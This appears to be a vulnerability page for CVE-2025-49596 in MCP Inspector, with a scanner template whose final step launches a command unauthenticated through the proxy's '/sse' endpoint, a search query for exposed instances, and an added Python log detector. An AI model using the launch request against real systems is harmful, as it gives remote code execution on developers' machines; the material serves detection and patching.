The MCP inspector is a developer tool for testing and debugging MCP servers. Versions of MCP Inspector below 0.14.1 are vulnerable to remote code execution due to lack of authentication between the Inspector client and proxy, allowing unauthenticated requests to launch MCP commands over stdio.
PoC code [publicly available]
id: CVE-2025-49596

info:
  name: MCP Inspector < 0.14.0 Unauthenticated Remote Code Execution
  author: ye11oc4t
  severity: critical
  description: |
    The MCP inspector is a developer tool for testing and debugging MCP servers. Versions of MCP Inspector below 0.14.1 are vulnerable to remote code execution due to lack of authentication between the Inspector client and proxy, allowing unauthenticated requests to launch MCP commands over stdio.
  remediation: Users should immediately upgrade to version 0.14.1 or later to address these vulnerabilities.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-49596
    - https://github.com/modelcontextprotocol/inspector
    - https://github.com/modelcontextprotocol/inspector/commit/50df0e1ec488f3983740b4d28d2a968f12eb8979
    - https://github.com/modelcontextprotocol/inspector/security/advisories/GHSA-7f8r-222p-6f5g
    - https://www.oligo.security/blog/critical-rce-vulnerability-in-anthropic-mcp-inspector-cve-2025-49596
  classification:
    epss-score: 0.04801
    epss-percentile: 0.89072
  metadata:
    verified: true
    fofa-query: title="MCP Inspector"
  tags: cve,cve2025,mcp,anthropic,unauth

flow: http(1) && http(2) && http(3)

http:
  # Step 1: confirm the target serves the Inspector UI and pull its bundle path
  - method: GET
    path:
      - "{{BaseURL}}"
    host-redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body,"MCP Inspector")
        condition: and
        internal: true
    extractors:
      - type: regex
        name: js
        group: 1
        part: body
        regex:
          - 'src="([^"]+\.js)"'
        internal: true

  # Step 2: read the version constant from the bundle and gate on the affected range
  - method: GET
    path:
      - "{{BaseURL}}{{js}}"
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - compare_versions(version, '< 0.14.0')
        condition: and
        internal: true
    extractors:
      - type: regex
        name: version
        internal: true
        group: 1
        part: body
        regex:
          - 'const\s+version\s*=\s*"([0-9]+\.[0-9]+\.[0-9]+)'

  # Step 3: the unauthenticated stdio launch; a session endpoint in the reply proves the proxy accepted it
  - method: GET
    path:
      - "{{BaseURL}}/sse?transportType=stdio&command=echo&args[]=hello-from-brower"
    matchers:
      - type: dsl
        dsl:
          - contains_all(body,"endpoint","/message?sessionId=")
          - status_code == 200
        condition: and
    extractors:
      - type: regex
        name: session_id
        part: body
        group: 1
        regex:
          - '\/message\?sessionId=([a-z0-9-]+)' # Returns: Session ID as proof of execution
# digest: 4a0a00473045045022061d827994af3712dc246222bf91fb0af200d1e19f3e809fc89806166f0c39476022100a479ba719c915983768cee68d74f2e59635853610dc45f32c1be16b6c0451192:922c64590222798bb761d5b6d8e72950
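From the defender's side, the request the template sends in its final step is also what an exploitation attempt looks like in the proxy's access log. The following Python is an added detection example, not part of the template or the Inspector project; the log line layout and the sample lines are constructed, and only the `/sse` path and its `transportType`/`command` parameters come from the template above.

```python
# Added example: flag access-log entries matching the unauthenticated stdio
# launch request against MCP Inspector proxies (CVE-2025-49596).
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log in a common-log-style layout (an assumption; adapt LOG_RE).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jul/2025:10:00:01 +0000] "GET / HTTP/1.1" 200 1543
10.0.0.5 - - [01/Jul/2025:10:00:02 +0000] "GET /sse?transportType=stdio&command=echo&args[]=hello-from-brower HTTP/1.1" 200 88
10.0.0.7 - - [01/Jul/2025:10:00:03 +0000] "GET /sse?transportType=sse&url=http%3A%2F%2Flocalhost%3A3001 HTTP/1.1" 200 88
10.0.0.9 - - [01/Jul/2025:10:00:04 +0000] "POST /message?sessionId=3f2b8c1a-5d6e-4f70-9a1b-2c3d4e5f6a7b HTTP/1.1" 202 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def is_stdio_launch(target: str) -> bool:
    """True when the request asks the proxy to spawn a stdio MCP server."""
    parts = urlsplit(target)
    if parts.path.rstrip("/") != "/sse":
        return False
    qs = parse_qs(parts.query)  # keeps the literal "args[]" key used by the client
    return qs.get("transportType") == ["stdio"] and "command" in qs


def find_stdio_launches(log_text: str) -> list[dict]:
    """One finding per matching request: source, time, status and the requested command."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not is_stdio_launch(m["target"]):
            continue
        qs = parse_qs(urlsplit(m["target"]).query)
        findings.append({
            "src": m["ip"],
            "time": m["ts"],
            "status": int(m["status"]),  # 200 means the proxy accepted the launch
            "command": qs["command"][0],
            "args": qs.get("args[]", []),
        })
    return findings


if __name__ == "__main__":
    for finding in find_stdio_launches(SAMPLE_LOG):
        print(finding)
```

A non-200 status on a matching line still records an attempt; correlate the source with hosts that should be talking to a developer tool bound to localhost.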